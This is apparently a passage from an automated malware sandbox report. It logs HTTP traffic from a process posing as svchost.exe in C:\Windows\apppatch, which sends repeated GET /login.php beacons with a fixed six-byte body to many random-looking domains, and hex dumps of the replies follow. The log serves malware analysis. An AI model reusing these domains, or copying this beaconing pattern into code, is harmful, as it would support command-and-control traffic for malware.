                                                                                                                                                                                                              Set-Cookie: btst=61afe5b7d011093f87c495eec767f391|8.46.123.33|1724431669|1724431669|0|1|0; path=/; domain=.gahyhiz.com; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                              Set-Cookie: snkz=8.46.123.33; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                              Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                              35192.168.2.464271172.234.222.143806720C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                              Aug 23, 2024 18:47:51.415267944 CEST268OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                              Referer: http://www.google.com
                                                                                                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                              Host: vojyqem.com
                                                                                                                                                                                                              Content-Length: 6
                                                                                                                                                                                                              Data Raw: 9e 84 b5 e8 71 28
                                                                                                                                                                                                              Data Ascii: q(


                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                              36192.168.2.46427244.221.84.105806720C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                              Aug 23, 2024 18:47:51.415682077 CEST373OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                              Referer: http://www.google.com
                                                                                                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                              Host: qetyfuv.com
                                                                                                                                                                                                              Content-Length: 6
                                                                                                                                                                                                              Cookie: btst=aa122ab46703e7e3b9d2518b0ebc8c78|8.46.123.33|1724431621|1724431621|0|1|0; snkz=8.46.123.33
                                                                                                                                                                                                              Data Raw: 9e 84 b5 e8 71 28
                                                                                                                                                                                                              Data Ascii: q(
                                                                                                                                                                                                              Aug 23, 2024 18:47:51.929857969 CEST333INHTTP/1.1 200 OK
                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                              Date: Fri, 23 Aug 2024 16:47:51 GMT
                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                              Set-Cookie: btst=aa122ab46703e7e3b9d2518b0ebc8c78|8.46.123.33|1724431671|1724431621|25|2|0; path=/; domain=.qetyfuv.com; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                              Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                              37192.168.2.464273162.255.119.102806720C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                              Aug 23, 2024 18:47:51.431920052 CEST268OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                              Referer: http://www.google.com
                                                                                                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                              Host: gahyqah.com
                                                                                                                                                                                                              Content-Length: 6
                                                                                                                                                                                                              Data Raw: 9e 84 b5 e8 71 28
                                                                                                                                                                                                              Data Ascii: q(
                                                                                                                                                                                                              Aug 23, 2024 18:47:52.202933073 CEST303INHTTP/1.1 302 Found
                                                                                                                                                                                                              Date: Fri, 23 Aug 2024 16:47:52 GMT
                                                                                                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                              Content-Length: 55
                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                              Location: http://www.gahyqah.com/login.php
                                                                                                                                                                                                              X-Served-By: Namecheap URL Forward
                                                                                                                                                                                                              Server: namecheap-nginx
                                                                                                                                                                                                              Data Raw: 3c 61 20 68 72 65 66 3d 27 68 74 74 70 3a 2f 2f 77 77 77 2e 67 61 68 79 71 61 68 2e 63 6f 6d 2f 6c 6f 67 69 6e 2e 70 68 70 27 3e 46 6f 75 6e 64 3c 2f 61 3e 2e 0a 0a
                                                                                                                                                                                                              Data Ascii: <a href='http://www.gahyqah.com/login.php'>Found</a>.


                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                              38192.168.2.46427444.221.84.105806720C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                              Aug 23, 2024 18:47:51.434623957 CEST373OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                              Referer: http://www.google.com
                                                                                                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                              Host: vocyzit.com
                                                                                                                                                                                                              Content-Length: 6
                                                                                                                                                                                                              Cookie: btst=3e0cadd8e2dc2fdcf92b9c2073c70c58|8.46.123.33|1724431621|1724431621|0|1|0; snkz=8.46.123.33
                                                                                                                                                                                                              Data Raw: 9e 84 b5 e8 71 28
                                                                                                                                                                                                              Data Ascii: q(
                                                                                                                                                                                                              Aug 23, 2024 18:47:51.938406944 CEST333INHTTP/1.1 200 OK
                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                              Date: Fri, 23 Aug 2024 16:47:51 GMT
                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                              Set-Cookie: btst=3e0cadd8e2dc2fdcf92b9c2073c70c58|8.46.123.33|1724431671|1724431621|25|2|0; path=/; domain=.vocyzit.com; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                              Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                              39192.168.2.46427569.162.80.60806720C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                              Aug 23, 2024 18:47:51.569689989 CEST318OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                              Referer: http://www.google.com
                                                                                                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                              Host: lysyfyj.com
                                                                                                                                                                                                              Content-Length: 6
                                                                                                                                                                                                              Cookie: sid=5243bebf-616f-11ef-adb1-e1f00ce9ce88
                                                                                                                                                                                                              Data Raw: 9e 84 b5 e8 71 28
                                                                                                                                                                                                              Data Ascii: q(
                                                                                                                                                                                                              Aug 23, 2024 18:47:52.109009027 CEST772INHTTP/1.1 200 OK
                                                                                                                                                                                                              accept-ch: Sec-CH-UA, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version, Sec-CH-UA-Mobile
                                                                                                                                                                                                              cache-control: max-age=0, private, must-revalidate
                                                                                                                                                                                                              connection: close
                                                                                                                                                                                                              content-length: 481
                                                                                                                                                                                                              content-type: text/html; charset=utf-8
                                                                                                                                                                                                              date: Fri, 23 Aug 2024 16:47:51 GMT
                                                                                                                                                                                                              server: nginx
                                                                                                                                                                                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 4c 6f 61 64 69 6e 67 2e 2e 2e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 27 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 27 3e 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 72 65 70 6c 61 63 65 28 27 68 74 74 70 3a 2f 2f 6c 79 73 79 66 79 6a 2e 63 6f 6d 2f 6c 6f 67 69 6e 2e 70 68 70 3f 63 68 3d 31 26 6a 73 3d 65 79 4a 68 62 47 63 69 4f 69 4a 49 55 7a 49 31 4e 69 49 73 49 6e 52 35 63 43 49 36 49 6b 70 58 56 43 4a 39 2e 65 79 4a 68 64 57 51 69 4f 69 4a 4b 62 32 74 6c 62 69 49 73 49 6d 56 34 63 43 49 36 4d 54 63 79 4e 44 51 7a 4f 44 67 33 4d 69 77 69 61 57 46 30 49 6a 6f 78 4e 7a 49 30 4e 44 4d 78 4e 6a 63 79 4c 43 4a 70 63 33 4d 69 4f 69 4a 4b 62 32 74 6c 62 69 49 73 49 6d 70 7a 49 6a 6f 78 4c 43 4a 71 64 47 6b 69 4f 69 49 79 64 6d 34 32 61 58 55 78 4d 32 39 77 4d 44 42 31 4d 6a 5a 74 62 32 63 77 59 57 35 71 4e 47 49 69 4c 43 4a 75 59 6d 59 69 4f 6a 45 33 4d 6a 51 30 4d 7a 45 32 4e 7a [TRUNCATED]
                                                                                                                                                                                                              Data Ascii: <html><head><title>Loading...</title></head><body><script type='text/javascript'>window.location.replace('http://lysyfyj.com/login.php?ch=1&js=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJhdWQiOiJKb2tlbiIsImV4cCI6MTcyNDQzODg3MiwiaWF0IjoxNzI0NDMxNjcyLCJpc3MiOiJKb2tlbiIsImpzIjoxLCJqdGkiOiIydm42aXUxM29wMDB1MjZtb2cwYW5qNGIiLCJuYmYiOjE3MjQ0MzE2NzIsInRzIjoxNzI0NDMxNjcyMDQ2NTYxfQ.Ne4-mxaPTVeMqfnRBvDH87vkVfoIrftMvuRbLbM8nK8&sid=5243bebf-616f-11ef-adb1-e1f00ce9ce88');</script></body></html>


                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                              40192.168.2.46427618.208.156.248806720C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                              Aug 23, 2024 18:47:51.633881092 CEST373OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                              Referer: http://www.google.com
                                                                                                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                              Host: vonypom.com
                                                                                                                                                                                                              Content-Length: 6
                                                                                                                                                                                                              Cookie: btst=ee59b14dfaa9c8907c706ea22e956ef8|8.46.123.33|1724431621|1724431621|0|1|0; snkz=8.46.123.33
                                                                                                                                                                                                              Data Raw: 9e 84 b5 e8 71 28
                                                                                                                                                                                                              Data Ascii: q(
                                                                                                                                                                                                              Aug 23, 2024 18:47:52.139826059 CEST333INHTTP/1.1 200 OK
                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                              Date: Fri, 23 Aug 2024 16:47:52 GMT
                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                              Set-Cookie: btst=ee59b14dfaa9c8907c706ea22e956ef8|8.46.123.33|1724431672|1724431621|25|2|0; path=/; domain=.vonypom.com; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                              Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                              41192.168.2.4642773.94.10.34806720C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                              Aug 23, 2024 18:47:51.643433094 CEST373OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                              Referer: http://www.google.com
                                                                                                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                              Host: lymyxid.com
                                                                                                                                                                                                              Content-Length: 6
                                                                                                                                                                                                              Cookie: btst=162891e75d1d854fb9d05e52998b5935|8.46.123.33|1724431621|1724431621|0|1|0; snkz=8.46.123.33
                                                                                                                                                                                                              Data Raw: 9e 84 b5 e8 71 28
                                                                                                                                                                                                              Data Ascii: q(
                                                                                                                                                                                                              Aug 23, 2024 18:47:52.143423080 CEST333INHTTP/1.1 200 OK
                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                              Date: Fri, 23 Aug 2024 16:47:52 GMT
                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                              Set-Cookie: btst=162891e75d1d854fb9d05e52998b5935|8.46.123.33|1724431672|1724431621|25|2|0; path=/; domain=.lymyxid.com; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                              Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                              42192.168.2.464283172.234.222.14380
                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                              Aug 23, 2024 18:47:51.969778061 CEST268OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                              Referer: http://www.google.com
                                                                                                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                              Host: vojyqem.com
                                                                                                                                                                                                              Content-Length: 6
                                                                                                                                                                                                              Data Raw: 9e 84 b5 e8 71 28
                                                                                                                                                                                                              Data Ascii: q(


                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                              43192.168.2.4642845.79.71.225806720C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                              Aug 23, 2024 18:47:52.041651011 CEST268OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                              Referer: http://www.google.com
                                                                                                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                              Host: gatyfus.com
                                                                                                                                                                                                              Content-Length: 6
                                                                                                                                                                                                              Data Raw: 9e 84 b5 e8 71 28
                                                                                                                                                                                                              Data Ascii: q(


                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                              44192.168.2.46428591.195.240.19806720C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                              Aug 23, 2024 18:47:52.212944031 CEST277OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                              Referer: http://www.google.com
                                                                                                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                              Host: www.gahyqah.com
                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                              Data Raw: 9e 84 b5 e8 71 28
                                                                                                                                                                                                              Data Ascii: q(
                                                                                                                                                                                                              Aug 23, 2024 18:47:52.905960083 CEST1236INHTTP/1.1 200 OK
                                                                                                                                                                                                              date: Fri, 23 Aug 2024 16:47:52 GMT
                                                                                                                                                                                                              content-type: text/html; charset=UTF-8
                                                                                                                                                                                                              transfer-encoding: chunked
                                                                                                                                                                                                              vary: Accept-Encoding
                                                                                                                                                                                                              expires: Mon, 26 Jul 1997 05:00:00 GMT
                                                                                                                                                                                                              cache-control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                                                                                              pragma: no-cache
                                                                                                                                                                                                              x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANnylWw2vLY4hUn9w06zQKbhKBfvjFUCsdFlb6TdQhxb9RXWXuI4t31c+o8fYOv/s8q1LGPga3DE1L/tHU4LENMCAwEAAQ==_g5rlXs9RuRW4dglqQ5LydJEttSTVBsfpTg5YbTbTgxQyCxJaX/4wWztIAOuRl2yVYhX0WGF1Yaew3U85nGI5uA==
                                                                                                                                                                                                              last-modified: Fri, 23 Aug 2024 16:47:52 GMT
                                                                                                                                                                                                              x-cache-miss-from: parking-89b87dbbb-ntdtc
                                                                                                                                                                                                              server: Parking/1.0
                                                                                                                                                                                                              Data Raw: 32 45 33 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 6e 79 6c 57 77 32 76 4c 59 34 68 55 6e 39 77 30 36 7a 51 4b 62 68 4b 42 66 76 6a 46 55 43 73 64 46 6c 62 36 54 64 51 68 78 62 39 52 58 57 58 75 49 34 74 33 31 63 2b 6f 38 66 59 4f 76 2f 73 38 71 31 4c 47 50 67 61 33 44 45 31 4c 2f 74 48 55 34 4c 45 4e 4d 43 41 77 45 41 41 51 3d 3d 5f 67 35 72 6c 58 73 39 52 75 52 57 34 64 67 6c 71 51 35 4c 79 64 4a 45 74 74 53 54 56 42 73 66 70 54 67 35 59 62 54 62 54 67 78 51 79 43 78 4a 61 58 2f 34 77 57 7a 74 49 41 4f 75 52 6c 32 79 56 59 68 58 30 57 47 46 31 59 61 65 77 33 55 38 35 6e 47 49 35 75 41 3d 3d 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 3c 74 69 74 6c 65 3e 67 61 68 79 71 61 68 2e 63 6f 6d 26 6e 62 73 70 3b 2d 26 6e 62 73 70 3b 67 61 68 79 71 61 68 20 [TRUNCATED]
                                                                                                                                                                                                              Data Ascii: 2E3<!DOCTYPE html><html lang="en" data-adblockkey=MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANnylWw2vLY4hUn9w06zQKbhKBfvjFUCsdFlb6TdQhxb9RXWXuI4t31c+o8fYOv/s8q1LGPga3DE1L/tHU4LENMCAwEAAQ==_g5rlXs9RuRW4dglqQ5LydJEttSTVBsfpTg5YbTbTgxQyCxJaX/4wWztIAOuRl2yVYhX0WGF1Yaew3U85nGI5uA==><head><meta charset="utf-8"><title>gahyqah.com&nbsp;-&nbsp;gahyqah Resources and Information.</title><meta name="viewport" content="width=device-width,initial-scale=1.0,maximum-scale=1.0,user-scalable=0"><meta name="description" content="gahyqah.com is your first and best source for all of the information youre looking for. From ge
                                                                                                                                                                                                              Aug 23, 2024 18:47:52.906145096 CEST1236INData Raw: 6e 65 72 61 6c 20 74 6f 70 69 63 73 20 74 6f 20 6d 6f 72 65 20 6f 66 20 77 68 61 74 20 79 6f 75 20 77 6f 75 6c 64 20 65 78 70 65 63 74 20 74 6f 20 66 69 6e 64 20 68 65 72 65 2c 20 67 61 68 79 71 61 68 2e 63 6f 6d 20 68 61 73 20 69 74 20 61 6c 6c
                                                                                                                                                                                                              Data Ascii: neral topics to more of what you would expect to find here, gahyqah.com has it all. We hope you find what you are searching for!"><link 1088 rel="icon" type="image/png" href="//img.sedoparking.com/templates/logos/sed
                                                                                                                                                                                                              Aug 23, 2024 18:47:52.906157970 CEST1236INData Raw: 7b 62 6f 72 64 65 72 2d 73 74 79 6c 65 3a 6e 6f 6e 65 7d 73 76 67 3a 6e 6f 74 28 3a 72 6f 6f 74 29 7b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 62 75 74 74 6f 6e 2c 69 6e 70 75 74 2c 6f 70 74 67 72 6f 75 70 2c 73 65 6c 65 63 74 2c 74 65 78
                                                                                                                                                                                                              Data Ascii: {border-style:none}svg:not(:root){overflow:hidden}button,input,optgroup,select,textarea{font-family:sans-serif;font-size:100%;line-height:1.15;margin:0}button,input{overflow:visible}button,select{text-transform:none}button,html [type=button],[
                                                                                                                                                                                                              Aug 23, 2024 18:47:52.907152891 CEST1236INData Raw: 74 2d 69 74 65 6d 7d 63 61 6e 76 61 73 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 7d 74 65 6d 70 6c 61 74 65 7b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 7d 5b 68 69 64 64 65 6e 5d 7b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 7d 2e 61 6e
                                                                                                                                                                                                              Data Ascii: t-item}canvas{display:inline-block}template{display:none}[hidden]{display:none}.announcement{background:#0e162e;text-align:center;padding:0 5px}.announcement p{color:#848484}.announcement a{color:#848484}.container-header{margin:0 auto 0 auto;
                                                                                                                                                                                                              Aug 23, 2024 18:47:52.907165051 CEST1236INData Raw: 6e 74 61 69 6e 65 72 2d 64 69 73 63 6c 61 69 6d 65 72 20 61 7b 63 6f 6c 6f 72 3a 23 39 34 39 34 39 34 7d 2e 63 6f 6e 74 61 69 6e 65 72 2d 69 6d 70 72 69 6e 74 7b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 7d 2e 63 6f 6e 74 61 69 6e 65 72
                                                                                                                                                                                                              Data Ascii: ntainer-disclaimer a{color:#949494}.container-imprint{text-align:center}.container-imprint__content{display:inline-block}.container-imprint__content-text,.container-imprint__content-link{font-size:10px;color:#949494}.container-contact-us{text-
                                                                                                                                                                                                              Aug 23, 2024 18:47:52.908210993 CEST1236INData Raw: 66 6f 6e 74 2d 73 69 7a 65 3a 6c 61 72 67 65 72 7d 2e 63 6f 6e 74 61 69 6e 65 72 2d 63 6f 6f 6b 69 65 2d 6d 65 73 73 61 67 65 20 61 7b 63 6f 6c 6f 72 3a 23 66 66 66 7d 2e 63 6f 6f 6b 69 65 2d 6d 6f 64 61 6c 2d 77 69 6e 64 6f 77 7b 70 6f 73 69 74
                                                                                                                                                                                                              Data Ascii: font-size:larger}.container-cookie-message a{color:#fff}.cookie-modal-window{position:fixed;background-color:rgba(200,200,200,.75);top:0;right:0;bottom:0;left:0;-webkit-transition:all .3s;-moz-transition:all .3s;transition:all .3s;text-align:c
                                                                                                                                                                                                              Aug 23, 2024 18:47:52.908230066 CEST1236INData Raw: 65 3a 69 6e 69 74 69 61 6c 7d 2e 62 74 6e 2d 2d 73 75 63 63 65 73 73 2d 73 6d 3a 68 6f 76 65 72 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 31 61 36 62 32 63 3b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 23 31 61 36 62 32 63 3b 63 6f 6c
                                                                                                                                                                                                              Data Ascii: e:initial}.btn--success-sm:hover{background-color:#1a6b2c;border-color:#1a6b2c;color:#fff;font-size:initial}.btn--secondary{background-color:#8c959c;border-color:#8c959c;color:#fff;font-size:medium}.btn--secondary:hover{background-color:#727c8
                                                                                                                                                                                                              Aug 23, 2024 18:47:52.909483910 CEST1236INData Raw: 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 65 31 36 32 65 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 41 72 69 61 6c 2c 48 65 6c 76 65 74 69 63 61 2c 56 65 72 64 61 6e 61 2c 22 4c 75 63 69 64 61 20 47 72 61 6e 64 65 22 2c 73 61 6e 73 2d 73 65 72 69 66
                                                                                                                                                                                                              Data Ascii: round-color:#0e162e;font-family:Arial,Helvetica,Verdana,"Lucida Grande",sans-serif}body.cookie-message-enabled{padding-bottom:300px}.container-footer{padding-top:20px;padding-left:5%;padding-right:5%;padding-bottom:10px}.container-content{text
                                                                                                                                                                                                              Aug 23, 2024 18:47:52.909499884 CEST1236INData Raw: 28 2d 31 29 3b 74 72 61 6e 73 66 6f 72 6d 3a 73 63 61 6c 65 58 28 2d 31 29 3b 7a 2d 69 6e 64 65 78 3a 2d 31 3b 74 6f 70 3a 35 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 69 6e 68 65 72 69 74 7d 2e 63 6f 6e 74 61 69 6e 65 72 2d 63 6f 6e 74 65 6e 74 2d
                                                                                                                                                                                                              Data Ascii: (-1);transform:scaleX(-1);z-index:-1;top:50px;position:inherit}.container-content--lp{min-height:720px}.container-content--rp{min-height:820px}.container-content--rp .container-content__right,.container-content--rp .container-content__left{bac
                                                                                                                                                                                                              Aug 23, 2024 18:47:52.909508944 CEST556INData Raw: 65 6c 65 6d 65 6e 74 2d 6c 69 6e 6b 3a 6c 69 6e 6b 2c 2e 74 77 6f 2d 74 69 65 72 2d 61 64 73 2d 6c 69 73 74 5f 5f 6c 69 73 74 2d 65 6c 65 6d 65 6e 74 2d 6c 69 6e 6b 3a 76 69 73 69 74 65 64 7b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 75 6e
                                                                                                                                                                                                              Data Ascii: element-link:link,.two-tier-ads-list__list-element-link:visited{text-decoration:underline}.two-tier-ads-list__list-element-link:hover,.two-tier-ads-list__list-element-link:active,.two-tier-ads-list__list-element-link:focus{text-decoration:none
                                                                                                                                                                                                              Aug 23, 2024 18:47:52.911372900 CEST1236INData Raw: 74 2d 6c 69 6e 6b 3a 6c 69 6e 6b 2c 2e 77 65 62 61 72 63 68 69 76 65 2d 62 6c 6f 63 6b 5f 5f 6c 69 73 74 2d 65 6c 65 6d 65 6e 74 2d 6c 69 6e 6b 3a 76 69 73 69 74 65 64 7b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 2e 77 65 62
                                                                                                                                                                                                              Data Ascii: t-link:link,.webarchive-block__list-element-link:visited{text-decoration:none}.webarchive-block__list-element-link:hover,.webarchive-block__list-element-link:active,.webarchive-block__list-element-link:focus{text-decoration:underline}body{marg


                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                              45192.168.2.4642885.79.71.225806720C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                              Aug 23, 2024 18:48:11.498024940 CEST268OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                              Referer: http://www.google.com
                                                                                                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                              Host: gatyfus.com
                                                                                                                                                                                                              Content-Length: 6
                                                                                                                                                                                                              Data Raw: 9e 84 b5 e8 71 28
                                                                                                                                                                                                              Data Ascii: q(


                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                              46192.168.2.46428913.248.169.48806720C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                              Aug 23, 2024 18:48:23.604293108 CEST268OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                              Referer: http://www.google.com
                                                                                                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                              Host: pupydeq.com
                                                                                                                                                                                                              Content-Length: 6
                                                                                                                                                                                                              Data Raw: 9e 84 b5 e8 71 28
                                                                                                                                                                                                              Data Ascii: q(


                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                              47192.168.2.464290188.114.97.3806720C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                              Aug 23, 2024 18:48:23.643982887 CEST268OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                              Referer: http://www.google.com
                                                                                                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                              Host: lysyvan.com
                                                                                                                                                                                                              Content-Length: 6
                                                                                                                                                                                                              Data Raw: 9e 84 b5 e8 71 28
                                                                                                                                                                                                              Data Ascii: q(
